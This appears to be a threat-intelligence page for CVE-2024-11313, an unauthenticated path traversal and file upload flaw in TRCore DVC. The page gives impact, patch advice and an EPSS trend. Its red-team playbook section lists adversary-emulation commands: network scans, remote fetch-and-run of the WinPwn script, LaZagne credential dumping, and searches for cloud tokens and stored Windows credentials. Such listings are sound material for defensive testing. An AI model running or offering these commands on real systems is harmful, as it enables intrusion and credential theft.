CVE-2024-11313
Overview
The vulnerability in TRCore DVC is a path traversal combined with unrestricted file upload. The root cause lies in insufficient validation and sanitization of file paths and types during the upload process. This flaw affects the file upload component, allowing manipulation of directory paths and acceptance of arbitrary file formats without restriction.
Vulnerability Description
The DVC from TRCore has a Path Traversal vulnerability and does not restrict the types of uploaded files. This allows unauthenticated remote attackers to upload arbitrary files to any directory, leading to arbitrary code execution by uploading webshells.
Impact
An unauthenticated remote attacker can leverage this vulnerability to upload arbitrary files, including malicious webshells, to any directory on the server. This enables execution of arbitrary code with the privileges of the application, potentially leading to full system compromise. No authentication or user interaction is required (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward from a network perspective. The attacker can thus achieve confidentiality, integrity, and availability impacts as indicated by the CVSS vector (C:H/I:H/A:H).
Solution
According to the vendor advisories published by TW-CERT (https://www.twcert.org.tw/tw/cp-132-8250-1837b-1.html, https://www.twcert.org.tw/en/cp-139-8251-3455e-2.html), users of TRCore DVC should apply the latest patches released by TRCore addressing the file upload validation issues. The advisories include updated versions that enforce strict path validation and file type restrictions. Administrators are advised to follow the vendor's patch deployment instructions precisely to mitigate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the DVC from TRCore is characterized by a path traversal flaw, which allows attackers to manipulate file paths in a way that bypasses security controls. This flaw arises from insufficient validation of user input, enabling attackers to craft requests that can traverse the file system. As a result, they can upload files to arbitrary directories on the server. The lack of restrictions on the types of files that can be uploaded exacerbates the issue, as it opens the door for malicious file types, such as web shells, to be executed on the server. This vulnerability is particularly critical due to its potential to allow unauthenticated users to gain unauthorized access to the system.
Attack vectors exploiting this vulnerability are varied and can be executed with relative ease. An attacker could leverage automated scripts to send crafted requests to the DVC, manipulating the file upload functionality to include path traversal sequences. For instance, by using sequences like "../" in the file path, an attacker could navigate outside the intended upload directory and place malicious files in sensitive locations. Once a web shell is uploaded, the attacker can execute arbitrary commands on the server, effectively taking control of the system. This exploitation can be performed remotely, making it accessible to a wide range of potential attackers, from script kiddies to sophisticated threat actors.
The real-world impact of this vulnerability can be severe, particularly for organizations that rely on the affected product for critical operations. Successful exploitation can lead to unauthorized access to sensitive data, disruption of services, and potential data breaches. The business risks associated with such incidents include financial losses, reputational damage, and legal ramifications, especially if sensitive customer information is compromised. Organizations may also face regulatory scrutiny, depending on the nature of the data involved and the jurisdictions in which they operate. The high CVSS score of 9.8 reflects the critical nature of this vulnerability and underscores the urgency for organizations to address it.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a multi-faceted approach. First, regular security assessments, including penetration testing and code reviews, should be conducted to identify and remediate vulnerabilities in the application. Implementing strict input validation and sanitization measures is essential to prevent path traversal attacks. Additionally, organizations should restrict file uploads to only necessary file types and enforce size limitations. Employing a web application firewall (WAF) can also help to filter out malicious requests before they reach the application. Monitoring logs for unusual activity, such as unexpected file uploads or access attempts, can provide early warning signs of exploitation attempts.
In conclusion, the path traversal vulnerability in the DVC from TRCore represents a significant threat to organizations using this product. The ability for unauthenticated attackers to upload arbitrary files and execute code poses a critical risk that must be addressed promptly. By understanding the technical details of the vulnerability, recognizing potential attack vectors, assessing the real-world impact, and implementing robust detection and mitigation strategies, organizations can better protect themselves against the threats posed by this and similar vulnerabilities. Proactive security measures are essential in today’s evolving threat landscape to safeguard sensitive information and maintain operational integrity.
CSURFACE threat intelligence has detected a measurable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-11313, reflecting a growing likelihood of exploitation attempts in the near term. Although no new exploit techniques or proof-of-concept codes have surfaced, the upward trend in EPSS—rising by over 30%—indicates heightened attacker interest or preparatory activity targeting the TRCore DVC vulnerability. This shift is significant for defenders as it suggests that threat actors may be intensifying reconnaissance or weaponization efforts, increasing the risk of successful unauthorized file uploads and remote code execution. The vulnerability’s critical severity remains unchanged, but the elevated EPSS score warrants increased vigilance and prioritization in patch management and monitoring strategies. Our telemetry does not yet show a marked surge in active exploitation, but the trend underscores the potential for imminent exploitation campaigns, especially given the vulnerability’s ease of exploitation and impact.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Trcore | Dvc | All |
cpe:2.3:a:trcore:dvc:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-11313 |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/tw/cp-132-8250-1837b-1.html |
| twcert.org.tw |
GitHub CVE
third-party-advisory
|
https://www.twcert.org.tw/en/cp-139-8251-3455e-2.html |